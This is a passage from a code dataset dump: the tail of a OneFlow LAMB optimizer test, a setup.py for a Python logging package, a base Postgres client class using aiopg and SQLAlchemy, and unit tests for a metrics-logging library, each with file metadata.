beta_1=beta1,\n beta_2=beta2,\n epsilon=epsilon,\n weight_decay_rate=weight_decay,\n )\n var_list = []\n for i in range(train_iters):\n with tf.GradientTape() as tape:\n if i == 0:\n var0 = tf.identity(var)\n var_list.append(var0)\n random_mask = tf.Variable(random_masks_seq[i])\n loss = tf.reduce_mean(var + random_mask)\n gradients = tape.gradient(loss, var)\n opt.apply_gradients(zip([gradients], [var]))\n var_list.append(var.numpy())\n case = (\n device_type,\n x_shape,\n beta1,\n beta2,\n epsilon,\n weight_decay,\n learning_rate,\n train_iters,\n )\n test_case.assertTrue(len(x_list) == len(var_list))\n for (i, o, t) in zip(range(len(var_list)), x_list, var_list):\n diff = o - t\n test_case.assertTrue(\n np.allclose(x_list[i], var_list[i], rtol=0.001, atol=0.001), (i, case, diff)\n )\n diff = x.flatten() - var.numpy().flatten()\n test_case.assertTrue(\n np.allclose(x.flatten(), var.numpy().flatten(), rtol=0.001, atol=0.001),\n (case, diff),\n )\n\n\n@flow.unittest.skip_unless_1n1d()\nclass TestLamb(flow.unittest.TestCase):\n def test_lamb(test_case):\n arg_dict = OrderedDict()\n arg_dict[\"test_case\"] = [test_case]\n 
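# Each OrderedDict entry maps one sweep parameter to its candidate values;\n        # GenArgList (from test_util) presumably expands the dict into the cartesian\n        # product of all value lists (itertools.product-style), so every\n        # device/shape/hyperparameter combination below is exercised exactly once\n        # by the loop at the bottom of this method.\n        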
arg_dict[\"device_type\"] = [\"cpu\", \"gpu\"]\n arg_dict[\"x_shape\"] = [(10,)]\n arg_dict[\"beta1\"] = [0.9]\n arg_dict[\"beta2\"] = [0.999]\n arg_dict[\"epsilon\"] = [1e-06]\n arg_dict[\"weight_decay\"] = [0.01]\n arg_dict[\"learning_rate\"] = [0.0001]\n arg_dict[\"train_iters\"] = [10]\n for arg in GenArgList(arg_dict):\n compare_with_tensorflow_addons_lamb(*arg)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n", "sub_path": "python/oneflow/compatible/single_client/test/ops/test_lamb.py", "file_name": "test_lamb.py", "file_ext": "py", "file_size_in_byte": 4515, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "tensorflow.config.experimental.list_physical_devices", "line_number": 30, "usage_type": "call"}, {"api_name": "tensorflow.config", "line_number": 30, "usage_type": "attribute"}, {"api_name": "tensorflow.config.experimental.set_memory_growth", "line_number": 32, "usage_type": "call"}, {"api_name": "tensorflow.config", "line_number": 32, "usage_type": "attribute"}, {"api_name": "oneflow.compatible.single_client.clear_default_session", "line_number": 47, "usage_type": "call"}, {"api_name": "oneflow.compatible.single_client", "line_number": 47, "usage_type": "name"}, {"api_name": "oneflow.compatible.single_client.FunctionConfig", "line_number": 48, "usage_type": "call"}, {"api_name": "oneflow.compatible.single_client", "line_number": 48, "usage_type": "name"}, {"api_name": "oneflow.compatible.single_client.float32", "line_number": 49, "usage_type": "attribute"}, {"api_name": "oneflow.compatible.single_client", "line_number": 49, "usage_type": "name"}, {"api_name": "oneflow.compatible.single_client.typing.Numpy.Placeholder", "line_number": 53, "usage_type": "call"}, {"api_name": "oneflow.compatible.single_client.typing", "line_number": 53, "usage_type": "attribute"}, {"api_name": "oneflow.compatible.single_client", "line_number": 53, "usage_type": "name"}, {"api_name": "oneflow.compatible.single_client.float32", "line_number": 53, "usage_type": "attribute"}, {"api_name": "oneflow.compatible.single_client.scope.placement", "line_number": 55, "usage_type": "call"}, {"api_name": "oneflow.compatible.single_client.scope", "line_number": 55, "usage_type": "attribute"}, {"api_name": "oneflow.compatible.single_client", "line_number": 55, "usage_type": "name"}, {"api_name": "oneflow.compatible.single_client.get_variable", "line_number": 56, "usage_type": "call"}, {"api_name": "oneflow.compatible.single_client", "line_number": 56, "usage_type": "name"}, {"api_name": "oneflow.compatible.single_client.float32", "line_number": 59, "usage_type": "attribute"}, {"api_name": "oneflow.compatible.single_client", "line_number": 59, "usage_type": "name"}, {"api_name": "oneflow.compatible.single_client.random_uniform_initializer", "line_number": 60, "usage_type": "call"}, {"api_name": "oneflow.compatible.single_client", "line_number": 60, "usage_type": "name"}, {"api_name": "oneflow.compatible.single_client.math.reduce_mean", "line_number": 63, "usage_type": "call"}, {"api_name": "oneflow.compatible.single_client.math", "line_number": 63, "usage_type": "attribute"}, {"api_name": "oneflow.compatible.single_client", "line_number": 63, "usage_type": "name"}, {"api_name": "oneflow.compatible.single_client.optimizer.LAMB", "line_number": 64, "usage_type": "call"}, {"api_name": "oneflow.compatible.single_client.optimizer", "line_number": 64, "usage_type": "attribute"}, {"api_name": "oneflow.compatible.single_client", "line_number": 64, 
"usage_type": "name"}, {"api_name": "oneflow.compatible.single_client.optimizer.PiecewiseConstantScheduler", "line_number": 65, "usage_type": "call"}, {"api_name": "oneflow.compatible.single_client.optimizer", "line_number": 65, "usage_type": "attribute"}, {"api_name": "oneflow.compatible.single_client", "line_number": 65, "usage_type": "name"}, {"api_name": "oneflow.compatible.single_client.global_function", "line_number": 51, "usage_type": "call"}, {"api_name": "oneflow.compatible.single_client", "line_number": 51, "usage_type": "name"}, {"api_name": "oneflow.compatible.single_client.FunctionConfig", "line_number": 51, "usage_type": "call"}, {"api_name": "oneflow.compatible.single_client.typing", "line_number": 54, "usage_type": "attribute"}, {"api_name": "oneflow.compatible.single_client", "line_number": 54, "usage_type": "name"}, {"api_name": "numpy.random.uniform", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 75, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 75, "usage_type": "attribute"}, {"api_name": "numpy.copy", "line_number": 82, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 83, "usage_type": "call"}, {"api_name": "tensorflow_addons.optimizers.LAMB", "line_number": 84, "usage_type": "call"}, {"api_name": "tensorflow_addons.optimizers", "line_number": 84, "usage_type": "attribute"}, {"api_name": "tensorflow.GradientTape", "line_number": 93, "usage_type": "call"}, {"api_name": "tensorflow.identity", "line_number": 95, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 97, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.allclose", "line_number": 116, "usage_type": "call"}, {"api_name": "numpy.allclose", "line_number": 120, "usage_type": "call"}, {"api_name": "oneflow.compatible.single_client.unittest", "line_number": 126, "usage_type": "attribute"}, {"api_name": "oneflow.compatible.single_client", "line_number": 126, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 128, "usage_type": "call"}, {"api_name": "test_util.GenArgList", "line_number": 138, "usage_type": "call"}, {"api_name": "oneflow.compatible.single_client.unittest.skip_unless_1n1d", "line_number": 125, "usage_type": "call"}, {"api_name": "oneflow.compatible.single_client.unittest", "line_number": 125, "usage_type": "attribute"}, {"api_name": "oneflow.compatible.single_client", "line_number": 125, "usage_type": "name"}, {"api_name": "unittest.main", "line_number": 143, "usage_type": "call"}]} {"seq_id": "584236581", "text": "import os\nfrom setuptools import setup\n\nwith open(os.path.join(os.path.dirname(__file__), \"README.md\"), encoding=\"utf-8\") as f:\n long_description = f.read()\n\nmodule_version = \"0.1.5\"\n\nsetup(\n name=\"DailyLogger\",\n packages=[\"DailyLogger\"],\n version=module_version,\n license=\"MIT\",\n description=\"A basic daily logger to log python projects.\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n author=\"Samyak Ratna Tamrakar\",\n author_email=\"samyak.r.tamrakar@gmail.com\",\n url=\"https://github.com/srtamrakar/python-logger\",\n download_url=f\"https://github.com/srtamrakar/python-logger/archive/v_{module_version}.tar.gz\",\n keywords=[\"log\", \"logger\", \"logging\"],\n install_requires=[\"multiprocessing_logging==0.3.0\"],\n classifiers=[\n \"Development Status :: 4 - Beta\", # Either\"3 - Alpha\", \"4 - Beta\" or \"5 
- Production/Stable\"\n \"Intended Audience :: Developers\", # Define that your audience are developers\n \"Topic :: Software Development :: Build Tools\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.4\",\n \"Programming Language :: Python :: 3.5\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n ],\n)\n", "sub_path": "pypi_install_script/DailyLogger-0.1.5.tar/setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1352, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "os.path.join", "line_number": 4, "usage_type": "call"}, {"api_name": "os.path", "line_number": 4, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 4, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 9, "usage_type": "call"}]} {"seq_id": "345757332", "text": "import datetime\nfrom typing import Dict, Iterable, Mapping\n\nimport attr\n\nimport aiopg.sa\nfrom aiopg.sa.result import ResultProxy, RowProxy\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects.postgresql import Insert\nfrom sqlalchemy.sql.selectable import Select\nfrom sqlalchemy.sql import and_, not_\nfrom sqlalchemy.sql.schema import Column\n\nDEFAULT_PAGE_SIZE = 100\n\n\nclass BasePostgresClient:\n def __init__(\n self,\n usecase_class,\n engine: aiopg.sa.Engine,\n table: sa.Table,\n db_generated_fields: Iterable[str] = None,\n ):\n self.usecase_class = usecase_class\n self.engine = engine\n self.table = table\n self.db_generated_fields = db_generated_fields or [\"created_at\", \"updated_at\"]\n\n async def insert(self, usecase):\n serialized_usecase: Dict = self._serialize_for_db(usecase)\n async with self.engine.acquire() as conn:\n statement: Insert = (\n self.table.insert()\n .values(**serialized_usecase)\n .returning(*[column for column in self.table.columns])\n )\n results: ResultProxy = await conn.execute(statement)\n return await results.fetchone()\n\n async def select_first_where(\n self, include: Mapping = None, exclude: Mapping = None\n ):\n results = await self.select_where(include=include, exclude=exclude, page_size=1)\n if results:\n return results[0]\n return None\n\n async def select_where(\n self, include: Mapping = None, exclude: Mapping = None, page=0, page_size=None\n ):\n where_clause = self._generate_where_clause(include, exclude)\n page_size = page_size if page_size else DEFAULT_PAGE_SIZE\n async with self.engine.acquire() as conn:\n statement: Select = self.table.select().where(where_clause)\n paginated_statement = self._paginate_query(statement, page, page_size)\n results: ResultProxy = await conn.execute(paginated_statement)\n return [await self._deserialize_from_db(result) async for result in results]\n\n async def update_where(\n self, set_values: Mapping, include: Mapping = None, exclude: Mapping = None\n ):\n where_clause = self._generate_where_clause(include, exclude)\n async with self.engine.acquire() as conn:\n statement = self.table.update.where(where_clause)\n\n def _generate_where_clause(self, include: Mapping = None, exclude: Mapping = None):\n \"\"\"Turn inclusion/exclusion maps into SQLAlchemy `where` clause\"\"\"\n inclusion_ands = []\n exclusion_ands = []\n if include:\n for field, includes in include.items():\n table_col: Column = getattr(self.table.c, field)\n if _isiterable(includes):\n # Use SQL [column] IN [(values)]\n 
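# (SQLAlchemy's ColumnOperators.in_() renders the IN clause directly\n                    # from any iterable of values)\n                    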
inclusion_ands.append(table_col.in_(includes))\n else:\n # Use SQL [column] = [value]\n inclusion_ands.append(table_col == includes)\n if exclude:\n for field, excludes in exclude.items():\n table_col: Column = getattr(self.table.c, field)\n if _isiterable(excludes):\n # Use SQL [column] NOT IN [(values)]\n exclusion_ands.append(not_(table_col.in_(excludes)))\n else:\n # Use SQL [column] != [value]\n exclusion_ands.append(table_col != excludes)\n return and_(*inclusion_ands, *exclusion_ands)\n\n def _generate_values_clause(self, set_values: Mapping):\n pass\n\n def _paginate_query(self, where_clause, page=0, page_size=None):\n if page_size:\n where_clause = where_clause.limit(page_size)\n if page:\n where_clause = where_clause.offset(page * page_size)\n return where_clause\n\n async def _deserialize_from_db(self, row: RowProxy):\n # returns attrs object if successful\n row_dict = dict(row)\n return self.usecase_class(**row_dict)\n\n def _serialize_for_db(self, usecase) -> Dict:\n # at this point we're assuming attrs objects for usecases\n usecase_dict: Dict = attr.asdict(usecase)\n for db_generated_field in self.db_generated_fields:\n if usecase_dict.get(db_generated_field) is None:\n # inserting a non-nullable field with value None will result in a\n # `psycopg2.IntegrityError: null value in column violates not-null constraint`\n # we delete the value from the dict instead\n del usecase_dict[db_generated_field]\n for k, v in usecase_dict.items():\n if isinstance(v, datetime.datetime):\n usecase_dict[k]: str = v.isoformat()\n return usecase_dict\n\n\ndef _isiterable(var) -> bool:\n return isinstance(var, Iterable) and not isinstance(var, str)\n", "sub_path": "app/infrastructure/datastore/postgres/clients/base.py", "file_name": "base.py", "file_ext": "py", "file_size_in_byte": 4918, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "aiopg.sa.sa", "line_number": 21, "usage_type": "attribute"}, {"api_name": "aiopg.sa", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.Table", "line_number": 22, "usage_type": "attribute"}, {"api_name": "typing.Iterable", "line_number": 23, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 31, "usage_type": "name"}, {"api_name": "sqlalchemy.dialects.postgresql.Insert", "line_number": 33, "usage_type": "name"}, {"api_name": "aiopg.sa.result.ResultProxy", "line_number": 38, "usage_type": "name"}, {"api_name": "typing.Mapping", "line_number": 42, "usage_type": "name"}, {"api_name": "typing.Mapping", "line_number": 50, "usage_type": "name"}, {"api_name": "sqlalchemy.sql.selectable.Select", "line_number": 55, "usage_type": "name"}, {"api_name": "aiopg.sa.result.ResultProxy", "line_number": 57, "usage_type": "name"}, {"api_name": "typing.Mapping", "line_number": 61, "usage_type": "name"}, {"api_name": "typing.Mapping", "line_number": 67, "usage_type": "name"}, {"api_name": "sqlalchemy.sql.schema.Column", "line_number": 73, "usage_type": "name"}, {"api_name": "sqlalchemy.sql.schema.Column", "line_number": 82, "usage_type": "name"}, {"api_name": "sqlalchemy.sql.not_", "line_number": 85, "usage_type": "call"}, {"api_name": "sqlalchemy.sql.and_", "line_number": 89, "usage_type": "call"}, {"api_name": "typing.Mapping", "line_number": 91, "usage_type": "name"}, {"api_name": "aiopg.sa.result.RowProxy", "line_number": 101, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 108, "usage_type": "name"}, {"api_name": "attr.asdict", "line_number": 108, 
"usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 116, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 106, "usage_type": "name"}, {"api_name": "typing.Iterable", "line_number": 122, "usage_type": "argument"}]} {"seq_id": "19843667", "text": "import os\nimport glob\nimport unittest\nimport datetime\n\nfrom haymetric import Metrics, Units, Rotations\n\n\ndef remove_files(files):\n for f in glob.glob(files):\n os.remove(f)\n\n\ndef read_file_to_lines(filename):\n f = open(filename)\n lines = f.readlines()\n f.close()\n return lines\n\n\nclass TestHaymetric(unittest.TestCase):\n def setUp(self):\n self.log_path = \"tst/logs/Test.log\"\n # Wed, 11 May 2016 21:21:00 GMT\n self.sample_timestamp = 1463001660\n self.sample_logfile = self.__get_logfile(self.sample_timestamp)\n\n def tearDown(self):\n remove_files(self.log_path + \"*\")\n os.removedirs(\"tst/logs\")\n\n def test_emit_from_different_metrics(self):\n self.__assert_emit_metrics(\"service=MyTestProgram,market=Hanoi\",\n \"service=MyTestProgram,market=Hanoi\",\n \"method=GetAPI\", \"method=PushAPI\")\n\n def test_emit_metrics_with_dimensions_and_scopes_as_dict(self):\n self.__assert_emit_metrics({\"service\": \"MyTestProgram\", \"market\": \"Hanoi\"},\n {\"service\": \"MyTestProgram\", \"market\": \"Hanoi\"},\n {\"method\": \"GetAPI\"}, {\"method\": \"PushAPI\"})\n\n def test_rotation_when_time_changes(self):\n # Wed, 11 May 2016 20:33:01 GMT\n t1 = 1462998781\n # Wed, 11 May 2016 21:33:01 GMT\n t2 = 1463002381\n\n metrics = Metrics(self.log_path, \"service=MyTestProgram,market=Hanoi\")\n self.__add_values(metrics.get_scope(\"method=GetAPI\"))\n metrics.flush(t1)\n self.__add_counters(metrics.get_scope(\"method=PushAPI\"))\n metrics.flush(t2)\n metrics.close()\n t1_lines = read_file_to_lines(self.__get_logfile(t1))\n t2_lines = read_file_to_lines(self.__get_logfile(t2))\n self.assertEqual(4, len(t1_lines))\n self.assertEqual(\"Timestamp=1462998781\\n\", t1_lines[0])\n self.assertEqual(\"Dimensions=market=Hanoi,method=GetAPI,service=MyTestProgram\\n\", t1_lines[1])\n self.assertEqual(\"Metrics=NoUnit=999+1,DBTime=10ms,Time=1200+800ms\\n\", t1_lines[2])\n self.assertEqual(\"---------\\n\", t1_lines[3])\n self.assertEqual(4, len(t2_lines))\n self.assertEqual(\"Timestamp=1463002381\\n\", t2_lines[0])\n self.assertEqual(\"Dimensions=market=Hanoi,method=PushAPI,service=MyTestProgram\\n\", t2_lines[1])\n self.assertEqual(\"Metrics=Failed=2,Pushes=11\\n\", t2_lines[2])\n self.assertEqual(\"---------\\n\", t2_lines[3])\n\n def test_multiple_rotations(self):\n metrics_minutely = Metrics(self.log_path, \"service=MyTestProgram,market=Hanoi\", Rotations.MINUTELY)\n metrics_minutely.flush()\n self.assertTrue(os.path.isfile(self.__get_logfile(rotation=Rotations.MINUTELY)))\n metrics_hourly = Metrics(self.log_path, \"service=MyTestProgram,market=Hanoi\", Rotations.HOURLY)\n metrics_hourly.flush()\n self.assertTrue(os.path.isfile(self.__get_logfile(rotation=Rotations.HOURLY)))\n metrics_daily = Metrics(self.log_path, \"service=MyTestProgram,market=Hanoi\", Rotations.DAILY)\n metrics_daily.flush()\n self.assertTrue(os.path.isfile(self.__get_logfile(rotation=Rotations.DAILY)))\n\n def test_multiple_units(self):\n metrics = Metrics(self.log_path, \"service=MyTestProgram,market=Hanoi\")\n scope = metrics.get_scope()\n scope.add_value(\"NanoSecond\", 1, Units.NANOSECOND)\n scope.add_value(\"MicroSecond\", 2, Units.MICROSECOND)\n scope.add_value(\"MilliSecond\", 3, Units.MILLISECOND)\n scope.add_value(\"Second\", 4, 
Units.SECOND)\n scope.add_value(\"Minute\", 5, Units.MINUTE)\n scope.add_value(\"Hour\", 6, Units.HOUR)\n scope.add_value(\"Byte\", 7, Units.BYTE)\n scope.add_value(\"KiloByte\", 8, Units.KILOBYTE)\n scope.add_value(\"MegaByte\", 9, Units.MEGABYTE)\n scope.add_value(\"GigaByte\", 10, Units.GIGABYTE)\n metrics.flush(self.sample_timestamp)\n metrics.close()\n log_lines = read_file_to_lines(self.sample_logfile)\n self.assertEqual(4, len(log_lines))\n self.assertEqual('Timestamp=1463001660\\n', log_lines[0])\n self.assertEqual('Dimensions=market=Hanoi,service=MyTestProgram\\n', log_lines[1])\n self.assertEqual(\n \"Metrics=MilliSecond=3ms,Hour=6h,KiloByte=8kb,NanoSecond=1ns,GigaByte=10gb,Second=4s,MicroSecond=2us,Byte=7b,MegaByte=9mb,Minute=5m\\n\",\n log_lines[2])\n self.assertEqual('---------\\n', log_lines[3])\n\n def test_get_empty_scope(self):\n metrics = Metrics(self.log_path, \"service=MyTestProgram,market=Hanoi\")\n self.__add_values(metrics.get_scope())\n metrics.flush(self.sample_timestamp)\n metrics.close()\n log_lines = read_file_to_lines(self.sample_logfile)\n self.assertEqual(4, len(log_lines))\n self.assertEqual('Timestamp=1463001660\\n', log_lines[0])\n self.assertEqual('Dimensions=market=Hanoi,service=MyTestProgram\\n', log_lines[1])\n self.assertEqual('Metrics=NoUnit=999+1,DBTime=10ms,Time=1200+800ms\\n', log_lines[2])\n self.assertEqual('---------\\n', log_lines[3])\n\n def test_reset_after_flush(self):\n metrics = Metrics(self.log_path, \"service=MyTestProgram,market=Hanoi\")\n self.__add_values(metrics.get_scope(\"method=GetAPI\"))\n metrics.flush(self.sample_timestamp)\n self.__add_counters(metrics.get_scope(\"method=PushAPI\"))\n metrics.flush(self.sample_timestamp)\n metrics.flush(self.sample_timestamp)\n metrics.flush(self.sample_timestamp)\n metrics.close()\n log_lines = read_file_to_lines(self.sample_logfile)\n self.assertEqual(8, len(log_lines))\n self.assertEqual('Timestamp=1463001660\\n', log_lines[0])\n self.assertEqual('Dimensions=market=Hanoi,method=GetAPI,service=MyTestProgram\\n', log_lines[1])\n self.assertEqual('Metrics=NoUnit=999+1,DBTime=10ms,Time=1200+800ms\\n', log_lines[2])\n self.assertEqual('---------\\n', log_lines[3])\n self.assertEqual('Timestamp=1463001660\\n', log_lines[4])\n self.assertEqual('Dimensions=market=Hanoi,method=PushAPI,service=MyTestProgram\\n', log_lines[5])\n self.assertEqual('Metrics=Failed=2,Pushes=11\\n', log_lines[6])\n self.assertEqual('---------\\n', log_lines[7])\n\n def test_scope_override_and_multiple_updates(self):\n metrics = Metrics(self.log_path, \"service=MyTestProgram,market=Hanoi,method=PushAPI\")\n scope1 = metrics.get_scope(\"method=GetAPI , host = 1.2.3.4\")\n scope1.add_counter(\"CountIt\", 1)\n scope2 = metrics.get_scope(\" host = 1.2.3.4 , methoD=GetAPI\")\n scope2.add_counter(\"CountIt\", 8)\n metrics.flush(self.sample_timestamp)\n metrics.close()\n log_lines = read_file_to_lines(self.sample_logfile)\n self.assertEqual(4, len(log_lines))\n self.assertEqual('Timestamp=1463001660\\n', log_lines[0])\n self.assertEqual('Dimensions=host=1.2.3.4,market=Hanoi,method=GetAPI,service=MyTestProgram\\n', log_lines[1])\n self.assertEqual('Metrics=CountIt=9\\n', log_lines[2])\n self.assertEqual('---------\\n', log_lines[3])\n\n def test_scope_override(self):\n metrics = Metrics(self.log_path, \"service=MyTestProgram,market=Hanoi,method=PushAPI\")\n scope = metrics.get_scope(\"method=GetAPI\")\n scope.add_counter(\"MyCounter\", 1)\n metrics.flush(self.sample_timestamp)\n metrics.close()\n log_lines = 
read_file_to_lines(self.sample_logfile)\n self.assertEqual(4, len(log_lines))\n self.assertEqual('Timestamp=1463001660\\n', log_lines[0])\n self.assertEqual('Dimensions=market=Hanoi,method=GetAPI,service=MyTestProgram\\n', log_lines[1])\n self.assertEqual('Metrics=MyCounter=1\\n', log_lines[2])\n self.assertEqual('---------\\n', log_lines[3])\n\n def test_dimension_normalization(self):\n metrics = Metrics(self.log_path, \"maRket=Hanoi , SerViCe=MyTestProgram\")\n scope = metrics.get_scope(\"mEthod=PushAPI\")\n scope.add_counter(\"Success\", 9)\n metrics.flush(self.sample_timestamp)\n metrics.close()\n log_lines = read_file_to_lines(self.sample_logfile)\n self.assertEqual(4, len(log_lines))\n self.assertEqual('Timestamp=1463001660\\n', log_lines[0])\n self.assertEqual('Dimensions=market=Hanoi,method=PushAPI,service=MyTestProgram\\n', log_lines[1])\n self.assertEqual('Metrics=Success=9\\n', log_lines[2])\n self.assertEqual('---------\\n', log_lines[3])\n\n def test_counters_and_values(self):\n metrics = Metrics(self.log_path, \"service=MyTestProgram,market=Hanoi\")\n scope = metrics.get_scope(\"method=PushAPI\")\n self.__add_counters(scope)\n self.__add_values(scope)\n metrics.flush(self.sample_timestamp)\n metrics.close()\n log_lines = read_file_to_lines(self.sample_logfile)\n self.assertEqual(4, len(log_lines))\n self.assertEqual('Timestamp=1463001660\\n', log_lines[0])\n self.assertEqual('Dimensions=market=Hanoi,method=PushAPI,service=MyTestProgram\\n', log_lines[1])\n self.assertEqual('Metrics=Failed=2,Pushes=11,NoUnit=999+1,DBTime=10ms,Time=1200+800ms\\n', log_lines[2])\n self.assertEqual('---------\\n', log_lines[3])\n\n def __get_logfile(self, timestamp=None, rotation=Rotations.HOURLY):\n now = datetime.datetime.now()\n if timestamp:\n now = datetime.datetime.fromtimestamp(timestamp)\n if rotation is Rotations.MINUTELY:\n return self.log_path + \".\" + now.strftime(\"%Y-%m-%d-%H-%M\")\n if rotation is Rotations.HOURLY:\n return self.log_path + \".\" + now.strftime(\"%Y-%m-%d-%H\")\n if rotation is Rotations.DAILY:\n return self.log_path + \".\" + now.strftime(\"%Y-%m-%d\")\n\n def __assert_emit_metrics(self, dimension1, dimension2, scope1, scope2):\n metrics1 = Metrics(self.log_path, dimension1)\n self.__add_values(metrics1.get_scope(scope1))\n metrics1.flush(self.sample_timestamp)\n metrics1.close()\n metrics2 = Metrics(self.log_path, dimension2)\n self.__add_counters(metrics2.get_scope(scope2))\n metrics2.flush(self.sample_timestamp)\n metrics2.close()\n log_lines = read_file_to_lines(self.sample_logfile)\n self.assertEqual(8, len(log_lines))\n self.assertEqual('Timestamp=1463001660\\n', log_lines[0])\n self.assertEqual('Dimensions=market=Hanoi,method=GetAPI,service=MyTestProgram\\n', log_lines[1])\n self.assertEqual('Metrics=NoUnit=999+1,DBTime=10ms,Time=1200+800ms\\n', log_lines[2])\n self.assertEqual('---------\\n', log_lines[3])\n self.assertEqual('Timestamp=1463001660\\n', log_lines[4])\n self.assertEqual('Dimensions=market=Hanoi,method=PushAPI,service=MyTestProgram\\n', log_lines[5])\n self.assertEqual('Metrics=Failed=2,Pushes=11\\n', log_lines[6])\n self.assertEqual('---------\\n', log_lines[7])\n\n @staticmethod\n def __add_counters(scope):\n scope.add_counter(\"Pushes\", 10)\n scope.add_counter(\"Pushes\", 1)\n scope.add_counter(\"Failed\", 1)\n scope.add_counter(\"Failed\", 1)\n\n @staticmethod\n def __add_values(scope):\n scope.add_value(\"Time\", 1200, Units.MILLISECOND)\n scope.add_value(\"Time\", 800, Units.MILLISECOND)\n scope.add_value(\"DBTime\", 10, 
Units.MILLISECOND)\n scope.add_value(\"NoUnit\", 999)\n scope.add_value(\"NoUnit\", 1)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n", "sub_path": "tests/test_haymetric.py", "file_name": "test_haymetric.py", "file_ext": "py", "file_size_in_byte": 11490, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "glob.glob", "line_number": 10, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 11, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.removedirs", "line_number": 30, "usage_type": "call"}, {"api_name": "haymetric.Metrics", "line_number": 48, "usage_type": "call"}, {"api_name": "haymetric.Metrics", "line_number": 68, "usage_type": "call"}, {"api_name": "haymetric.Rotations.MINUTELY", "line_number": 68, "usage_type": "attribute"}, {"api_name": "haymetric.Rotations", "line_number": 68, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path", "line_number": 70, "usage_type": "attribute"}, {"api_name": "haymetric.Rotations.MINUTELY", "line_number": 70, "usage_type": "attribute"}, {"api_name": "haymetric.Rotations", "line_number": 70, "usage_type": "name"}, {"api_name": "haymetric.Metrics", "line_number": 71, "usage_type": "call"}, {"api_name": "haymetric.Rotations.HOURLY", "line_number": 71, "usage_type": "attribute"}, {"api_name": "haymetric.Rotations", "line_number": 71, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path", "line_number": 73, "usage_type": "attribute"}, {"api_name": "haymetric.Rotations.HOURLY", "line_number": 73, "usage_type": "attribute"}, {"api_name": "haymetric.Rotations", "line_number": 73, "usage_type": "name"}, {"api_name": "haymetric.Metrics", "line_number": 74, "usage_type": "call"}, {"api_name": "haymetric.Rotations.DAILY", "line_number": 74, "usage_type": "attribute"}, {"api_name": "haymetric.Rotations", "line_number": 74, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path", "line_number": 76, "usage_type": "attribute"}, {"api_name": "haymetric.Rotations.DAILY", "line_number": 76, "usage_type": "attribute"}, {"api_name": "haymetric.Rotations", "line_number": 76, "usage_type": "name"}, {"api_name": "haymetric.Metrics", "line_number": 79, "usage_type": "call"}, {"api_name": "haymetric.Units.NANOSECOND", "line_number": 81, "usage_type": "attribute"}, {"api_name": "haymetric.Units", "line_number": 81, "usage_type": "name"}, {"api_name": "haymetric.Units.MICROSECOND", "line_number": 82, "usage_type": "attribute"}, {"api_name": "haymetric.Units", "line_number": 82, "usage_type": "name"}, {"api_name": "haymetric.Units.MILLISECOND", "line_number": 83, "usage_type": "attribute"}, {"api_name": "haymetric.Units", "line_number": 83, "usage_type": "name"}, {"api_name": "haymetric.Units.SECOND", "line_number": 84, "usage_type": "attribute"}, {"api_name": "haymetric.Units", "line_number": 84, "usage_type": "name"}, {"api_name": "haymetric.Units.MINUTE", "line_number": 85, "usage_type": "attribute"}, {"api_name": "haymetric.Units", "line_number": 85, "usage_type": "name"}, {"api_name": "haymetric.Units.HOUR", "line_number": 86, "usage_type": "attribute"}, {"api_name": "haymetric.Units", "line_number": 86, "usage_type": "name"}, {"api_name": "haymetric.Units.BYTE", "line_number": 87, "usage_type": "attribute"}, {"api_name": 
"haymetric.Units", "line_number": 87, "usage_type": "name"}, {"api_name": "haymetric.Units.KILOBYTE", "line_number": 88, "usage_type": "attribute"}, {"api_name": "haymetric.Units", "line_number": 88, "usage_type": "name"}, {"api_name": "haymetric.Units.MEGABYTE", "line_number": 89, "usage_type": "attribute"}, {"api_name": "haymetric.Units", "line_number": 89, "usage_type": "name"}, {"api_name": "haymetric.Units.GIGABYTE", "line_number": 90, "usage_type": "attribute"}, {"api_name": "haymetric.Units", "line_number": 90, "usage_type": "name"}, {"api_name": "haymetric.Metrics", "line_number": 103, "usage_type": "call"}, {"api_name": "haymetric.Metrics", "line_number": 115, "usage_type": "call"}, {"api_name": "haymetric.Metrics", "line_number": 135, "usage_type": "call"}, {"api_name": "haymetric.Metrics", "line_number": 150, "usage_type": "call"}, {"api_name": "haymetric.Metrics", "line_number": 163, "usage_type": "call"}, {"api_name": "haymetric.Metrics", "line_number": 176, "usage_type": "call"}, {"api_name": "haymetric.Rotations.HOURLY", "line_number": 189, "usage_type": "attribute"}, {"api_name": "haymetric.Rotations", "line_number": 189, "usage_type": "name"}, {"api_name": 